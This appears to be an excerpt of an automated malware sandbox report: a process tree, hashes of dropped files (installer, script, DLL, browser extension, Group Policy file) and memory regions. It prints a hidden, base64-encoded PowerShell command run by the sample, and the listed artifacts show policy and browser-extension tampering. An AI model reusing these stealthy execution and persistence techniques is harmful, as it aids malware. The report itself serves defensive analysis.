                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:284
                                                                                                                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2204
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:1048
                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2684
                                                                                                                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:1824

                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                • C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\ipqjErW.xml

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  10bdf3d20029fb9f65750f192d971e4f

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  34a9b474a27a82f113936d0d3c58e6c658e7870a

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  114cfecdde4586c64d424dc1251f55b733008c2d91ea45521583f689b8b06057

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  b67fa6357f80acf48f6017fe037eda2095c98f6c9637589fdccea35def0ff7cd9f82d0dfd26cbc7f9d06c75c87466454d7a44e48231c2dfba14a4ba7347ecbc6

                                                                                                                                                                                                                                • C:\Program Files (x86)\QtKEgKYoTGTqC\leQIPIW.xml

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  557815a7d5e195d99dde0c4894aa6792

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  23dd087f22bbb6f25783b060fa6ea2b1e20ec653

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  7f97fbdcbbc54ccdea148c1ecbcc202e2cb1f2cbbe795398b621a3ac96731437

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  8a33a9aa1129311c0806b4bd2b4398196368b23848ff3bfc9a6c2bf09619112e6b6571050c56f366e89c3616ec5e9a842c623c3402e5cc623753ea9efe79008a

                                                                                                                                                                                                                                • C:\Program Files (x86)\dlfHiRefefjU2\IMoIeeT.xml

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  e7873d5f8026e8881a1ea5248f08c349

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  1f684c332ca5de4ee07a5f4d792f506d513a1d1e

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  55670585e97fbb31c457e5ae96bae22154b6d82a6e9bce17379a0a7401327b97

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  6b0b8804df87c4f0bb93264ef3d4b4b62f9f9c4aa49d525f1fe6d49471655f2d2ddeff53fbc4900ce4e9a27bbc0b37519559e4885cd1376fcdfee53e4849f737

                                                                                                                                                                                                                                • C:\Program Files (x86)\hsUwQAlMU\jWuXmiN.xml

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  33c43c19a5df7c6c2d081fc356917be7

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  68e332284fa0f67891786e0aaf77264157bec394

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  32da4555b131db101d5e0d98749adad6f9aa647d121b7b566914c6e81f75e10e

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  58d52fdcbeae8ab5feb614c46b758cba594c5954ec518c97015307658cde31fa5415ee561d2037e4d37dbec616ef2b20199f01bd4d3440a6eb9a9d52fde8311b

                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  879631fb310adc9d8218ee2f815dd09c

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  6a66c26bf053fd5f5f6f3f2557a8a41024595ee1

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  9fc44c2f452aeaa6e1a1b65dfed3d8bf9d1a686bebbb639599f0e85699e34c6f

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  b1378de72b575cca476a780360dcd6277dc283f906622eb1fc1e9c9df7803a5e2d29914617fde5c9faa5b236ed0c1af530ee020099a3c65751346fba0c5da89c

                                                                                                                                                                                                                                • C:\ProgramData\nivjmgppGaMJQQVB\Ubnvhwp.xml

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  c82cef8356f5895674eeb0eb8bf87609

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  2cb0156d5e1653bc65389f7f92882b340c0fa2da

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  504a84f7e47e689bbd2b76d671e3d795a0be5c3609581b0601c5c6aa102c6a0d

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  edf5ad867cbd6bc43a26f8bac1b01ed94093fa97fc9a68688ba35cc08d8dc78b795dab487334149b70705105591674be55ff9e831e521e60897dd5af2734ff15

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  187B

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  136B

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  150B

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  10KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  de1ca3ea0e3186e7b7461ceffe431019

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  4615db313f853a215b89b33cbe6ba5d772e8fd7d

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  23e9d1aaf41d32201690ba7e25cdceac1e4d636b0983585a6ac7b94ab5a458c7

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  fed8e9a8e6ca3b670fc46034dd69a78c7793a468b41c3f936a2db54b677afcfe72313913c8b8b6b057987a44a89c53b89edad7653f1bd330eb694cc46ebba105

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS1268.tmp\Install.exe

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  6.7MB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  a5dca05edc6eda6e2acfe7ca41641cc5

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  b772813e63a424ae31a2bd75c0067be03aae0165

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  986e2f087fe32332daf7215461a103fa25d86209ab704e29a81dc419435367ae

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  c3d865918176c064e638d2c892cb2ef45bc722fa9f3b4e1fb10ca6886054ff2d37cd9fd97fff08cdd95a017374109495bf48069fdc67355b34729fae654da2ed

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  36df182fc190a19622844ca434a6682f

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  629e36f8a954527227f12ae602301b89e7b0d9b0

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  b8992fbeb3c7b33535870d4eeec28f2fd3056bc24d9d943b0c9f2542ae45bc29

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  d9847126ca7c08461791ce8979f3de51f5a33e7a8ad557aca2c559e11a72f1f17e03e78b7c6c162e6b9c825b2508de5574c71d6bd7670ec93b28841b065ee381

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  f7030365515a364c66bb9ff26c51ed73

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  f8e81dde100df385f30cf33fc7d671a65e2d7022

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  7cd73cec04a958ee060c585d8cb5b2fb02f3acab2d99ad24a80bd6a4dbfe71bd

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  b65bdd36f5335ab9ef422ad5e2e33e9a2dd95ab96a73f832b745e22aa48f6fb5d83d0ae00968c119e98d061cfeeac96322fb69121c3e0f3338a7901a718bb129

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O7XBNBXA21Q68KDHXIIE.temp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  33da8b8915397a434a0dfdf3a15cc7d5

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  639ff172e809f28394c01682c0975e3871fa52bf

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  59e99ee8fb6ca983ab541d191ecee0386d1e05d53cce88ef35290761543f66ed

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  3f49885adcb7dde778dbbf1fa9549e4a88345361bc1048e8a3d2608a0e4099401a529406bff077add46018804ffccbb56191a9845161281d21df653c41d9404f

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9bot8sq2.default-release\prefs.js

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  b310b3ce93528b37ee952acb98316641

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  3bea577ef8bd9f02188b72d969c4927a6fe5344e

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  66e9f2a123c592e5a0847071392b7b267c132fe394f0edebe65b8401ae062cdb

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  f490c1475a1d76ebd5e2d25e252389d0ee44cb5333f023f060172544f34491bae1a76e37284718d17150e2bb27989916a48e4a98538a086652fbb0a616e8833f

                                                                                                                                                                                                                                • C:\Windows\Temp\QqEAMUespgTHJnVz\wWEQVCuC\AfIVookTbwqUaiGw.wsf

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  9KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  4b97a8421acc6ecf75e4852038f0c113

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  79e5f3bca55f945e2d5851f85ee898d6a93edb03

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  51559c33e9ecec78f6ce5bb40f2c1da4fafe2e2612123012ec4fd76574a4b4e7

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  cef05ec517a9e34025cf72e4e4eb352556b35778a504b4253430b71b8e4580fc799f7691b59f42458186d7c9c4afa4200418d956e54f47f66a5581bba086ed83

                                                                                                                                                                                                                                • C:\Windows\Temp\QqEAMUespgTHJnVz\xZNLbCcL\poNlnXz.dll

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  6.5MB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  21e3965bd08eabf0ee24dd9d17dc0d5c

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  8680d90f50ed3caf0b617a1cf512c664bdbd7be8

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  570e0b2d996c3151a08c5042555500988b7eca34c2126d335e06da13ce772f4a

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  9b5662e11db22c04c3f4463e493c28b5ef2a7a997e644a6cad8f38d8df2947f8f14b049d0d2136b4e98a53db9db94c5a2ff613b8cdbaa2c7107a46f855c81a3e

                                                                                                                                                                                                                                • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  bf1f631d5d6e9168c9e69deb988eeabe

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  54a1cc608061f3c9b117f3baaf0e09cedb12b45a

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  dbd6846ee4d005d54fc33705ae63914a1b7d08f5e1a9a6ed2bbbda0e36af5188

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  7610bb27af030ced451aa5107808448fa5d38979e4a198abd12e959daa9c351daa4c0e919d9c356471415ce5392c5a61e000ffdb2bd9ad7c8b7b507b2aea8cfc

                                                                                                                                                                                                                                • \Users\Admin\AppData\Local\Temp\7zS1094.tmp\Install.exe

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  6.3MB

                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  74d966a0e5bfb1e31704e80ed771c119

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  ac4df42d23b835d89ee65bd71df599fd8d9deb22

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  3ab9d890e8931e54ec72f19aa390fde3d3d809ee34bca02f661425738a62dcce

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  4cdf9d382ae0bc81ff4dbc87f3e7fecadee834b83398c982122ea8c9c31ef524893e5d18cb9ba64dd844ca08b47c4e20180df780ddd096338060d7d10fe3aa8d

                                                                                                                                                                                                                                • memory/896-56-0x00000000027E0000-0x00000000027E8000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                • memory/896-55-0x000000001B780000-0x000000001BA62000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  2.9MB

                                                                                                                                                                                                                                • memory/1500-334-0x0000000001450000-0x0000000001A1F000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  5.8MB

                                                                                                                                                                                                                                • memory/2032-45-0x000000001B660000-0x000000001B942000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  2.9MB

                                                                                                                                                                                                                                • memory/2032-46-0x0000000002810000-0x0000000002818000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                • memory/2164-36-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  5.8MB

                                                                                                                                                                                                                                • memory/2420-301-0x0000000002930000-0x00000000029B2000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  520KB

                                                                                                                                                                                                                                • memory/2420-85-0x0000000002070000-0x00000000020F5000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  532KB

                                                                                                                                                                                                                                • memory/2420-311-0x0000000003A00000-0x0000000003ADA000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  872KB

                                                                                                                                                                                                                                • memory/2420-74-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  5.8MB

                                                                                                                                                                                                                                • memory/2420-118-0x0000000002680000-0x00000000026DD000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  372KB

                                                                                                                                                                                                                                • memory/2664-24-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  5.8MB